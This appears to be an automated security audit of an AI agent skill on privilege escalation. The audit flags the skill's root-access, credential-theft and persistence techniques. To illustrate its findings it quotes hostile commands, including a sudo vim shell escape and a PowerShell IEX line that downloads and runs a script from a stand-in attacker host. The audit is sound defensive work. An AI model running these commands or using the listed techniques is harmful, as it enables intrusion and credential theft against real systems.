Privilege Escalation Methods
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONCREDENTIALS_UNSAFEDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
- [Privilege Escalation] (HIGH): The skill provides explicit commands to gain root/administrator access, including exploiting misconfigured sudo permissions (e.g., vim, find, awk), abusing SUID/capabilities, and Windows token impersonation. Examples: 'sudo vim -c ':!/bin/bash'' and 'execute-assembly sweetpotato.exe'.
- [Remote Code Execution] (HIGH): The skill contains a remote script execution pattern using PowerShell's IEX: 'powershell.exe -c 'iex (iwr http://attacker/shell.ps1)\''. This allows an attacker to download and execute arbitrary code directly into memory.
- [Credential Exposure & Exfiltration] (HIGH): Provides methods for stealing sensitive data and credentials, such as copying the Active Directory database ('ntds.dit'), dumping LSA secrets via Mimikatz, and performing DCSync attacks. It also accesses sensitive paths like '/etc/shadow' and '~/.ssh/id_rsa'.
- [Persistence Mechanisms] (HIGH): Includes instructions for maintaining long-term access to a compromised system, such as creating malicious scheduled tasks ('schtasks /create') and injecting payloads into cron scripts.
- [External Downloads] (MEDIUM): References several external hacking tools (Mimikatz, Rubeus, Impacket, BloodHound, etc.) which are typically used in malicious activity and would be flagged by endpoint security controls.
Audit Metadata